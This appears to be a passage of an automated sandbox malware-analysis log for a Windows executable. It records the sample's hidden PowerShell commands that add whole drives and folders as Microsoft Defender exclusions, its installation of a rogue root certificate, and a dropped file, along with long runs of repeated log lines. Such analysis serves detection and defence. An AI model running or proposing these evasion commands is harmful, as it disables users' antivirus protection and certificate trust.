Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 1feP5qTCl0.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: 1feP5qTCl0.exeStatic file information: File size 8077824 > 1048576
Source: 1feP5qTCl0.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x267e00
Source: 1feP5qTCl0.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x276a00
Source: 1feP5qTCl0.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A417E0 GlobalHandle,LoadLibraryA,GetProcAddress,19_2_00A417E0
Source: 1feP5qTCl0.exeStatic PE information: section name: .xdata
Source: 1feP5qTCl0.exeStatic PE information: section name: /4
Source: 1feP5qTCl0.exeStatic PE information: section name: /19
Source: 1feP5qTCl0.exeStatic PE information: section name: /32
Source: 1feP5qTCl0.exeStatic PE information: section name: /46
Source: 1feP5qTCl0.exeStatic PE information: section name: /65
Source: 1feP5qTCl0.exeStatic PE information: section name: /78
Source: 1feP5qTCl0.exeStatic PE information: section name: /90
Source: 1feP5qTCl0.exeStatic PE information: section name: .symtab

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\1feP5qTCl0.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeFile created: C:\Reka\rapnewsa.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
